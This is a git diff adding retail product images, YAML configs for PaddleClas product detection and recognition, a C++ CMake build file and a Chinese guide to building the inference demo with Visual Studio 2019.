b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinranchaxuanmiwulongcha.jpg new file mode 100644 index 0000000..f10d26b Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinranchaxuanmiwulongcha.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinruchakafeinatie.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinruchakafeinatie.jpg new file mode 100644 index 0000000..4eabe8b Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinruchakafeinatie.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinruchamoxiangnailv.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinruchamoxiangnailv.jpg new file mode 100644 index 0000000..558aa05 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinruchamoxiangnailv.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinruchanongxiangyuanwei.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinruchanongxiangyuanwei.jpg new file mode 100644 index 0000000..d9195d4 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinruchanongxiangyuanwei.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinrusuanjunsudaqipaoshui.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinrusuanjunsudaqipaoshui.jpg new file mode 100644 index 0000000..42962b4 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinrusuanjunsudaqipaoshui.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinsuanmeizhisudaqipaoshui.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinsuanmeizhisudaqipaoshui.jpg new file mode 100644 index 0000000..8c34e00 Binary files /dev/null and 
b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinsuanmeizhisudaqipaoshui.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinwutangbaitaoweisudaqipaoshui.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinwutangbaitaoweisudaqipaoshui.jpg new file mode 100644 index 0000000..00f8110 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinwutangbaitaoweisudaqipaoshui.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinwutangqiamanjuweisudaqipaoshui.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinwutangqiamanjuweisudaqipaoshui.jpg new file mode 100644 index 0000000..77486c3 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinwutangqiamanjuweisudaqipaoshui.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinyinghuaputaosudaqipaoshui.jpg b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinyinghuaputaosudaqipaoshui.jpg new file mode 100644 index 0000000..849c84f Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/gallery/yuanqisenlinyinghuaputaosudaqipaoshui.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/index_update/id_map.pkl b/Smart_container/PaddleClas/dataset/retail/index_update/id_map.pkl new file mode 100644 index 0000000..0e83e6e Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/index_update/id_map.pkl differ diff --git a/Smart_container/PaddleClas/dataset/retail/index_update/vector.index b/Smart_container/PaddleClas/dataset/retail/index_update/vector.index new file mode 100644 index 0000000..52f2da7 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/index_update/vector.index differ diff --git a/Smart_container/PaddleClas/dataset/retail/test.jpg b/Smart_container/PaddleClas/dataset/retail/test.jpg new file mode 100644 index 0000000..b58e897 Binary 
files /dev/null and b/Smart_container/PaddleClas/dataset/retail/test.jpg differ diff --git a/Smart_container/PaddleClas/dataset/retail/test1.jpg b/Smart_container/PaddleClas/dataset/retail/test1.jpg new file mode 100644 index 0000000..c96bc9e Binary files /dev/null and b/Smart_container/PaddleClas/dataset/retail/test1.jpg differ diff --git a/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg b/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg new file mode 100644 index 0000000..8dc68b4 Binary files /dev/null and b/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg differ diff --git a/Smart_container/PaddleClas/deploy/__init__.py b/Smart_container/PaddleClas/deploy/__init__.py new file mode 100644 index 0000000..eb018c3 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/__init__.py @@ -0,0 +1 @@ +from . import utils diff --git a/Smart_container/PaddleClas/deploy/configs/build_product.yaml b/Smart_container/PaddleClas/deploy/configs/build_product.yaml new file mode 100644 index 0000000..77fe030 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/configs/build_product.yaml @@ -0,0 +1,36 @@ +Global: + rec_inference_model_dir: "/root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer" + batch_size: 32 + use_gpu: False + enable_mkldnn: True + cpu_num_threads: 1 + enable_benchmark: True + use_fp16: False + ir_optim: True + use_tensorrt: False + gpu_mem: 8000 + enable_profile: False + +RecPreProcess: + transform_ops: + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + +RecPostProcess: null + +# indexing engine config +IndexProcess: + index_method: "HNSW32" # supported: HNSW32, IVF, Flat + index_dir: "/root/Smart_container/PaddleClas/dataset/retail/index" + image_root: "/root/Smart_container/PaddleClas/dataset/retail" + data_file: "/root/Smart_container/PaddleClas/dataset/retail/data_update.txt" + 
index_operation: "new" # suported: "append", "remove", "new" + delimiter: "\t" + dist_type: "IP" + embedding_size: 512 diff --git a/Smart_container/PaddleClas/deploy/configs/inference_client.yaml b/Smart_container/PaddleClas/deploy/configs/inference_client.yaml new file mode 100644 index 0000000..475d957 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/configs/inference_client.yaml @@ -0,0 +1,55 @@ +Global: + infer_imgs: "/root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg" + det_inference_model_dir: "/root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer" + rec_inference_model_dir: "/root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer" + rec_nms_thresold: 0.05 + + batch_size: 1 + image_shape: [3, 640, 640] + threshold: 0.2 + max_det_results: 5 + labe_list: + - foreground + + # inference engine config + use_gpu: False + enable_mkldnn: True + cpu_num_threads: 1 + enable_benchmark: True + use_fp16: False + ir_optim: True + use_tensorrt: False + gpu_mem: 8000 + enable_profile: False + +DetPreProcess: + transform_ops: + - DetResize: + interp: 2 + keep_ratio: false + target_size: [640, 640] + - DetNormalizeImage: + is_scale: true + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + - DetPermute: {} +DetPostProcess: {} + +RecPreProcess: + transform_ops: + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + +RecPostProcess: null + +# indexing engine config +IndexProcess: + index_dir: "/root/Smart_container/PaddleClas/dataset/retail/index_update" + return_k: 5 + score_thres: 0.5 diff --git a/Smart_container/PaddleClas/deploy/configs/inference_cls.yaml b/Smart_container/PaddleClas/deploy/configs/inference_cls.yaml new file mode 100644 index 0000000..7954880 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/configs/inference_cls.yaml @@ -0,0 +1,33 @@ +Global: + infer_imgs: 
"./images/ILSVRC2012_val_00000010.jpeg" + inference_model_dir: "./models" + batch_size: 1 + use_gpu: True + enable_mkldnn: True + cpu_num_threads: 10 + enable_benchmark: True + use_fp16: False + ir_optim: True + use_tensorrt: False + gpu_mem: 8000 + enable_profile: False +PreProcess: + transform_ops: + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + channel_num: 3 + - ToCHWImage: +PostProcess: + main_indicator: Topk + Topk: + topk: 5 + class_id_map_file: "../ppcls/utils/imagenet1k_label_list.txt" + SavePreLabel: + save_dir: ./pre_label/ diff --git a/Smart_container/PaddleClas/deploy/configs/inference_det.yaml b/Smart_container/PaddleClas/deploy/configs/inference_det.yaml new file mode 100644 index 0000000..7180c59 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/configs/inference_det.yaml @@ -0,0 +1,33 @@ +Global: + infer_imgs: "./images/wangzai.jpg" + det_inference_model_dir: "./models/ppyolov2_r50vd_dcn_mainbody_v1.0_infer" + batch_size: 1 + image_shape: [3, 640, 640] + threshold: 0.2 + max_det_results: 1 + labe_list: + - foreground + + # inference engine config + use_gpu: True + enable_mkldnn: True + cpu_num_threads: 10 + enable_benchmark: True + use_fp16: False + ir_optim: True + use_tensorrt: False + gpu_mem: 8000 + enable_profile: False + +DetPreProcess: + transform_ops: + - DetResize: + interp: 2 + keep_ratio: false + target_size: [640, 640] + - DetNormalizeImage: + is_scale: true + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + - DetPermute: {} +DetPostProcess: {} diff --git a/Smart_container/PaddleClas/deploy/configs/inference_product.yaml b/Smart_container/PaddleClas/deploy/configs/inference_product.yaml new file mode 100644 index 0000000..f639cbb --- /dev/null +++ b/Smart_container/PaddleClas/deploy/configs/inference_product.yaml @@ -0,0 +1,55 @@ +Global: + infer_imgs: 
"/root/Smart_container/PaddleClas/dataset/retail/test1.jpg" + det_inference_model_dir: "/root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer" + rec_inference_model_dir: "/root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer" + rec_nms_thresold: 0.05 + + batch_size: 1 + image_shape: [3, 640, 640] + threshold: 0.2 + max_det_results: 100 + labe_list: + - foreground + + # inference engine config + use_gpu: False + enable_mkldnn: True + cpu_num_threads: 1 + enable_benchmark: True + use_fp16: False + ir_optim: True + use_tensorrt: False + gpu_mem: 8000 + enable_profile: False + +DetPreProcess: + transform_ops: + - DetResize: + interp: 2 + keep_ratio: false + target_size: [640, 640] + - DetNormalizeImage: + is_scale: true + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + - DetPermute: {} +DetPostProcess: {} + +RecPreProcess: + transform_ops: + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + +RecPostProcess: null + +# indexing engine config +IndexProcess: + index_dir: "/root/Smart_container/PaddleClas/dataset/retail/index_update" + return_k: 5 + score_thres: 0.5 diff --git a/Smart_container/PaddleClas/deploy/configs/inference_rec.yaml b/Smart_container/PaddleClas/deploy/configs/inference_rec.yaml new file mode 100644 index 0000000..5346510 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/configs/inference_rec.yaml @@ -0,0 +1,35 @@ +Global: + infer_imgs: "./images/wangzai.jpg" + rec_inference_model_dir: "./models/product_ResNet50_vd_aliproduct_v1.0_infer" + batch_size: 1 + image_shape: [3, 640, 640] + threshold: 0.5 + max_det_results: 1 + labe_list: + - foreground + + # inference engine config + use_gpu: False + enable_mkldnn: True + cpu_num_threads: 10 + enable_benchmark: True + use_fp16: False + ir_optim: True + use_tensorrt: False + gpu_mem: 8000 + enable_profile: False + 
+RecPreProcess: + transform_ops: + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + +RecPostProcess: null diff --git a/Smart_container/PaddleClas/deploy/cpp/CMakeLists.txt b/Smart_container/PaddleClas/deploy/cpp/CMakeLists.txt new file mode 100644 index 0000000..4b11eec --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/CMakeLists.txt @@ -0,0 +1,219 @@ +project(clas_system CXX C) +cmake_minimum_required(VERSION 3.14) + +option(WITH_MKL "Compile demo with MKL/OpenBlas support, default use MKL." ON) +option(WITH_GPU "Compile demo with GPU/CPU, default use CPU." OFF) +option(WITH_STATIC_LIB "Compile demo with static/shared library, default use static." ON) +option(WITH_TENSORRT "Compile demo with TensorRT." OFF) + +SET(PADDLE_LIB "" CACHE PATH "Location of libraries") +SET(OPENCV_DIR "" CACHE PATH "Location of libraries") +SET(CUDA_LIB "" CACHE PATH "Location of libraries") +SET(CUDNN_LIB "" CACHE PATH "Location of libraries") +SET(TENSORRT_DIR "" CACHE PATH "Compile demo with TensorRT") + +set(DEMO_NAME "clas_system") + +macro(safe_set_static_flag) + foreach(flag_var + CMAKE_CXX_FLAGS CMAKE_CXX_FLAGS_DEBUG CMAKE_CXX_FLAGS_RELEASE + CMAKE_CXX_FLAGS_MINSIZEREL CMAKE_CXX_FLAGS_RELWITHDEBINFO) + if(${flag_var} MATCHES "/MD") + string(REGEX REPLACE "/MD" "/MT" ${flag_var} "${${flag_var}}") + endif(${flag_var} MATCHES "/MD") + endforeach(flag_var) +endmacro() + +if (WITH_MKL) + ADD_DEFINITIONS(-DUSE_MKL) +endif() + +if(NOT DEFINED PADDLE_LIB) + message(FATAL_ERROR "please set PADDLE_LIB with -DPADDLE_LIB=/path/paddle/lib") +endif() + +if(NOT DEFINED OPENCV_DIR) + message(FATAL_ERROR "please set OPENCV_DIR with -DOPENCV_DIR=/path/opencv") +endif() + + +if (WIN32) + include_directories("${PADDLE_LIB}/paddle/fluid/inference") + include_directories("${PADDLE_LIB}/paddle/include") + 
link_directories("${PADDLE_LIB}/paddle/fluid/inference") + find_package(OpenCV REQUIRED PATHS ${OPENCV_DIR}/build/ NO_DEFAULT_PATH) + +else () + find_package(OpenCV REQUIRED PATHS ${OPENCV_DIR}/share/OpenCV NO_DEFAULT_PATH) + include_directories("${PADDLE_LIB}/paddle/include") + link_directories("${PADDLE_LIB}/paddle/lib") +endif () +include_directories(${OpenCV_INCLUDE_DIRS}) + +if (WIN32) + add_definitions("/DGOOGLE_GLOG_DLL_DECL=") + set(CMAKE_C_FLAGS_DEBUG "${CMAKE_C_FLAGS_DEBUG} /bigobj /MTd") + set(CMAKE_C_FLAGS_RELEASE "${CMAKE_C_FLAGS_RELEASE} /bigobj /MT") + set(CMAKE_CXX_FLAGS_DEBUG "${CMAKE_CXX_FLAGS_DEBUG} /bigobj /MTd") + set(CMAKE_CXX_FLAGS_RELEASE "${CMAKE_CXX_FLAGS_RELEASE} /bigobj /MT") + if (WITH_STATIC_LIB) + safe_set_static_flag() + add_definitions(-DSTATIC_LIB) + endif() +else() + set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -g -o3 -std=c++11") + set(CMAKE_STATIC_LIBRARY_PREFIX "") +endif() +message("flags" ${CMAKE_CXX_FLAGS}) + + +if (WITH_GPU) + if (NOT DEFINED CUDA_LIB OR ${CUDA_LIB} STREQUAL "") + message(FATAL_ERROR "please set CUDA_LIB with -DCUDA_LIB=/path/cuda-8.0/lib64") + endif() + if (NOT WIN32) + if (NOT DEFINED CUDNN_LIB) + message(FATAL_ERROR "please set CUDNN_LIB with -DCUDNN_LIB=/path/cudnn_v7.4/cuda/lib64") + endif() + endif(NOT WIN32) +endif() + +include_directories("${PADDLE_LIB}/third_party/install/protobuf/include") +include_directories("${PADDLE_LIB}/third_party/install/glog/include") +include_directories("${PADDLE_LIB}/third_party/install/gflags/include") +include_directories("${PADDLE_LIB}/third_party/install/xxhash/include") +include_directories("${PADDLE_LIB}/third_party/install/zlib/include") +include_directories("${PADDLE_LIB}/third_party/boost") +include_directories("${PADDLE_LIB}/third_party/eigen3") + +include_directories("${CMAKE_SOURCE_DIR}/") + +if (NOT WIN32) + if (WITH_TENSORRT AND WITH_GPU) + include_directories("${TENSORRT_DIR}/include") + link_directories("${TENSORRT_DIR}/lib") + endif() +endif(NOT WIN32) + 
+link_directories("${PADDLE_LIB}/third_party/install/zlib/lib") + +link_directories("${PADDLE_LIB}/third_party/install/protobuf/lib") +link_directories("${PADDLE_LIB}/third_party/install/glog/lib") +link_directories("${PADDLE_LIB}/third_party/install/gflags/lib") +link_directories("${PADDLE_LIB}/third_party/install/xxhash/lib") +link_directories("${PADDLE_LIB}/paddle/lib") + + +if(WITH_MKL) + include_directories("${PADDLE_LIB}/third_party/install/mklml/include") + if (WIN32) + set(MATH_LIB ${PADDLE_LIB}/third_party/install/mklml/lib/mklml.lib + ${PADDLE_LIB}/third_party/install/mklml/lib/libiomp5md.lib) + else () + set(MATH_LIB ${PADDLE_LIB}/third_party/install/mklml/lib/libmklml_intel${CMAKE_SHARED_LIBRARY_SUFFIX} + ${PADDLE_LIB}/third_party/install/mklml/lib/libiomp5${CMAKE_SHARED_LIBRARY_SUFFIX}) + execute_process(COMMAND cp -r ${PADDLE_LIB}/third_party/install/mklml/lib/libmklml_intel${CMAKE_SHARED_LIBRARY_SUFFIX} /usr/lib) + endif () + set(MKLDNN_PATH "${PADDLE_LIB}/third_party/install/mkldnn") + if(EXISTS ${MKLDNN_PATH}) + include_directories("${MKLDNN_PATH}/include") + if (WIN32) + set(MKLDNN_LIB ${MKLDNN_PATH}/lib/mkldnn.lib) + else () + set(MKLDNN_LIB ${MKLDNN_PATH}/lib/libmkldnn.so.0) + endif () + endif() +else() + if (WIN32) + set(MATH_LIB ${PADDLE_LIB}/third_party/install/openblas/lib/openblas${CMAKE_STATIC_LIBRARY_SUFFIX}) + else () + set(MATH_LIB ${PADDLE_LIB}/third_party/install/openblas/lib/libopenblas${CMAKE_STATIC_LIBRARY_SUFFIX}) + endif () +endif() + +# Note: libpaddle_inference_api.so/a must put before libpaddle_fluid.so/a +if(WITH_STATIC_LIB) + if(WIN32) + set(DEPS + ${PADDLE_LIB}/paddle/lib/paddle_inference${CMAKE_STATIC_LIBRARY_SUFFIX}) + else() + set(DEPS + ${PADDLE_LIB}/paddle/lib/libpaddle_inference${CMAKE_STATIC_LIBRARY_SUFFIX}) + endif() +else() + if(WIN32) + set(DEPS + ${PADDLE_LIB}/paddle/lib/paddle_inference${CMAKE_SHARED_LIBRARY_SUFFIX}) + else() + set(DEPS + 
${PADDLE_LIB}/paddle/lib/libpaddle_inference${CMAKE_SHARED_LIBRARY_SUFFIX}) + endif() +endif(WITH_STATIC_LIB) + +if (NOT WIN32) + set(DEPS ${DEPS} + ${MATH_LIB} ${MKLDNN_LIB} + glog gflags protobuf z xxhash + ) + if(EXISTS "${PADDLE_LIB}/third_party/install/snappystream/lib") + set(DEPS ${DEPS} snappystream) + endif() + if (EXISTS "${PADDLE_LIB}/third_party/install/snappy/lib") + set(DEPS ${DEPS} snappy) + endif() +else() + set(DEPS ${DEPS} + ${MATH_LIB} ${MKLDNN_LIB} + glog gflags_static libprotobuf xxhash) + set(DEPS ${DEPS} libcmt shlwapi) + if (EXISTS "${PADDLE_LIB}/third_party/install/snappy/lib") + set(DEPS ${DEPS} snappy) + endif() + if(EXISTS "${PADDLE_LIB}/third_party/install/snappystream/lib") + set(DEPS ${DEPS} snappystream) + endif() +endif(NOT WIN32) + + +if(WITH_GPU) + if(NOT WIN32) + if (WITH_TENSORRT) + set(DEPS ${DEPS} ${TENSORRT_DIR}/lib/libnvinfer${CMAKE_SHARED_LIBRARY_SUFFIX}) + set(DEPS ${DEPS} ${TENSORRT_DIR}/lib/libnvinfer_plugin${CMAKE_SHARED_LIBRARY_SUFFIX}) + endif() + set(DEPS ${DEPS} ${CUDA_LIB}/libcudart${CMAKE_SHARED_LIBRARY_SUFFIX}) + set(DEPS ${DEPS} ${CUDNN_LIB}/libcudnn${CMAKE_SHARED_LIBRARY_SUFFIX}) + else() + set(DEPS ${DEPS} ${CUDA_LIB}/cudart${CMAKE_STATIC_LIBRARY_SUFFIX} ) + set(DEPS ${DEPS} ${CUDA_LIB}/cublas${CMAKE_STATIC_LIBRARY_SUFFIX} ) + set(DEPS ${DEPS} ${CUDNN_LIB}/cudnn${CMAKE_STATIC_LIBRARY_SUFFIX}) + endif() +endif() + + +if (NOT WIN32) + set(EXTERNAL_LIB "-ldl -lrt -lgomp -lz -lm -lpthread") + set(DEPS ${DEPS} ${EXTERNAL_LIB}) +endif() + +set(DEPS ${DEPS} ${OpenCV_LIBS}) + +include(FetchContent) +include(external-cmake/auto-log.cmake) +include_directories(${FETCHCONTENT_BASE_DIR}/extern_autolog-src) + +AUX_SOURCE_DIRECTORY(./src SRCS) +add_executable(${DEMO_NAME} ${SRCS}) + +target_link_libraries(${DEMO_NAME} ${DEPS}) + +if (WIN32 AND WITH_MKL) + add_custom_command(TARGET ${DEMO_NAME} POST_BUILD + COMMAND ${CMAKE_COMMAND} -E copy_if_different ${PADDLE_LIB}/third_party/install/mklml/lib/mklml.dll ./mklml.dll + 
COMMAND ${CMAKE_COMMAND} -E copy_if_different ${PADDLE_LIB}/third_party/install/mklml/lib/libiomp5md.dll ./libiomp5md.dll + COMMAND ${CMAKE_COMMAND} -E copy_if_different ${PADDLE_LIB}/third_party/install/mkldnn/lib/mkldnn.dll ./mkldnn.dll + COMMAND ${CMAKE_COMMAND} -E copy_if_different ${PADDLE_LIB}/third_party/install/mklml/lib/mklml.dll ./release/mklml.dll + COMMAND ${CMAKE_COMMAND} -E copy_if_different ${PADDLE_LIB}/third_party/install/mklml/lib/libiomp5md.dll ./release/libiomp5md.dll + COMMAND ${CMAKE_COMMAND} -E copy_if_different ${PADDLE_LIB}/third_party/install/mkldnn/lib/mkldnn.dll ./release/mkldnn.dll + ) +endif() diff --git a/Smart_container/PaddleClas/deploy/cpp/docs/imgs/ILSVRC2012_val_00000666.JPEG b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/ILSVRC2012_val_00000666.JPEG new file mode 100644 index 0000000..ebb5625 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/ILSVRC2012_val_00000666.JPEG differ diff --git a/Smart_container/PaddleClas/deploy/cpp/docs/imgs/cpp_infer_result.png b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/cpp_infer_result.png new file mode 100644 index 0000000..fe9de1a Binary files /dev/null and b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/cpp_infer_result.png differ diff --git a/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step1.png b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step1.png new file mode 100644 index 0000000..58fdf2f Binary files /dev/null and b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step1.png differ diff --git a/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step2.png b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step2.png new file mode 100644 index 0000000..f1b5fd0 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step2.png differ diff --git a/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step3.png b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step3.png new file mode 
100644 index 0000000..cb1b2ae Binary files /dev/null and b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step3.png differ diff --git a/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step4.png b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step4.png new file mode 100644 index 0000000..5fc0408 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step4.png differ diff --git a/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step5.png b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step5.png new file mode 100644 index 0000000..fbb2e4c Binary files /dev/null and b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step5.png differ diff --git a/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step6.png b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step6.png new file mode 100644 index 0000000..86a8039 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/cpp/docs/imgs/vs2019_step6.png differ diff --git a/Smart_container/PaddleClas/deploy/cpp/docs/windows_vs2019_build.md b/Smart_container/PaddleClas/deploy/cpp/docs/windows_vs2019_build.md new file mode 100644 index 0000000..6e2b370 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/docs/windows_vs2019_build.md @@ -0,0 +1,119 @@ +# Visual Studio 2019 Community CMake 编译指南 + +PaddleClas在Windows 平台下基于`Visual Studio 2019 Community` 进行了测试。微软从`Visual Studio 2017`开始即支持直接管理`CMake`跨平台编译项目,但是直到`2019`才提供了稳定和完全的支持,所以如果你想使用CMake管理项目编译构建,我们推荐使用`Visual Studio 2019`。如果您希望通过生成`sln解决方案`的方式进行编译,可以参考该文档:[https://zhuanlan.zhihu.com/p/145446681](https://zhuanlan.zhihu.com/p/145446681)。 + + +## 前置条件 +* Visual Studio 2019 +* CUDA 9.0 / CUDA 10.0,cudnn 7.6+ (仅在使用GPU版本的预测库时需要) +* CMake 3.0+ + +请确保系统已经正确安装并配置好上述基本软件,其中: + * 在安装`Visual Studio 2019`时,`工作负载`需要勾选`使用C++的桌面开发`; + * CUDA需要正确安装并设置系统环境变量; + * CMake需要正确安装并将路径添加到系统环境变量中。 + +以下测试基于`Visual Studio 2019 Community`版本。 + +**下面所有示例以工作目录为 `D:\projects`演示**。 + +### Step1: 下载PaddlePaddle C++ 预测库 
paddle_inference_install_dir + +PaddlePaddle C++ 预测库针对不同的`CPU`和`CUDA`版本提供了不同的预编译版本,请根据实际情况下载: [C++预测库下载列表](https://www.paddlepaddle.org.cn/documentation/docs/zh/develop/guides/05_inference_deployment/inference/windows_cpp_inference.html)。 + +解压后`D:\projects\paddle_inference_install_dir`目录包含内容为: + +``` +paddle_inference_install_dir +├── paddle # paddle核心库和头文件 +| +├── third_party # 第三方依赖库和头文件 +| +└── version.txt # 版本和编译信息 +``` + +然后需要将`Paddle预测库`的路径`D:\projects\paddle_inference_install_dir\paddle\lib`添加到系统环境变量`Path`中。 + +### Step2: 安装配置OpenCV + +1. 在OpenCV官网下载适用于Windows平台的3.4.6版本, [下载地址](https://sourceforge.net/projects/opencvlibrary/files/3.4.6/opencv-3.4.6-vc14_vc15.exe/download) +2. 运行下载的可执行文件,将OpenCV解压至指定目录,如`D:\projects\opencv` +3. 配置环境变量,如下流程所示 + - 此电脑(我的电脑)-> 属性 -> 高级系统设置 -> 环境变量 + - 在系统变量中找到Path(如没有,自行创建),并双击编辑 + - 新建,将OpenCV路径填入并保存,如 `D:\projects\opencv\build\x64\vc14\bin` + +### Step3: 使用Visual Studio 2019直接编译CMake + +1. 打开Visual Studio 2019 Community,点击 `继续但无需代码` + +![step2](./imgs/vs2019_step1.png) + +2. 点击: `文件`->`打开`->`CMake` + +![step2.1](./imgs/vs2019_step2.png) + +选择项目代码所在路径,并打开`CMakeList.txt`: + +![step2.2](./imgs/vs2019_step3.png) + +3. 点击:`项目`->`cpp_inference_demo的CMake设置` + +![step3](./imgs/vs2019_step4.png) + +4. 请设置以下参数的值 + + +| 名称 | 值 | 保存到 JSON | +| ----------------------------- | ------------------ | ----------- | +| CMAKE_BACKWARDS_COMPATIBILITY | 3.17 | [√] | +| CMAKE_BUILD_TYPE | RelWithDebInfo | [√] | +| CUDA_LIB | CUDA的库路径 | [√] | +| CUDNN_LIB | CUDNN的库路径 | [√] | +| OpenCV_DIR | OpenCV的安装路径 | [√] | +| PADDLE_LIB | Paddle预测库的路径 | [√] | +| WITH_GPU | [√] | [√] | +| WITH_MKL | [√] | [√] | +| WITH_STATIC_LIB | [√] | [√] | + +**注意**: + +1. `CMAKE_BACKWARDS_COMPATIBILITY` 的值请根据自己 `cmake` 版本设置,`cmake` 版本可以通过命令:`cmake --version` 查询; +2. `CUDA_LIB` 、 `CUDNN_LIB` 的值仅需在使用**GPU版本**预测库时指定,其中CUDA库版本尽量对齐,**使用9.0、10.0版本,不使用9.2、10.1等版本CUDA库**; +3. 
在设置 `CUDA_LIB`、`CUDNN_LIB`、`OPENCV_DIR`、`PADDLE_LIB` 时,点击 `浏览`,分别设置相应的路径; + * `CUDA_LIB`和`CUDNN_LIB`:该路径取决于CUDA与CUDNN的安装位置。 + * `OpenCV_DIR`:该路径下需要有`.cmake`文件,一般为`opencv/build/`; + * `PADDLE_LIB`:该路径下需要有`CMakeCache.txt`文件,一般为`paddle_inference_install_dir/`。 +4. 在使用 `CPU` 版预测库时,请不要勾选 `WITH_GPU` - `保存到 JSON`。 + +![step4](./imgs/vs2019_step5.png) + +**设置完成后**, 点击上图中 `保存并生成CMake缓存以加载变量` 。 + +5. 点击`生成`->`全部生成` + +![step6](./imgs/vs2019_step6.png) + + +### Step4: 预测及可视化 + +在完成上述操作后,`Visual Studio 2019` 编译产出的可执行文件 `clas_system.exe` 在 `out\build\x64-Release`目录下,打开`cmd`,并切换到该目录: + +``` +cd D:\projects\PaddleClas\deploy\cpp_infer\out\build\x64-Release +``` +可执行文件`clas_system.exe`即为编译产出的的预测程序,其使用方法如下: + +```shell +.\clas_system.exe D:\projects\PaddleClas\deploy\cpp_infer\tools\config.txt .\docs\ILSVRC2012_val_00008306.JPEG +``` + 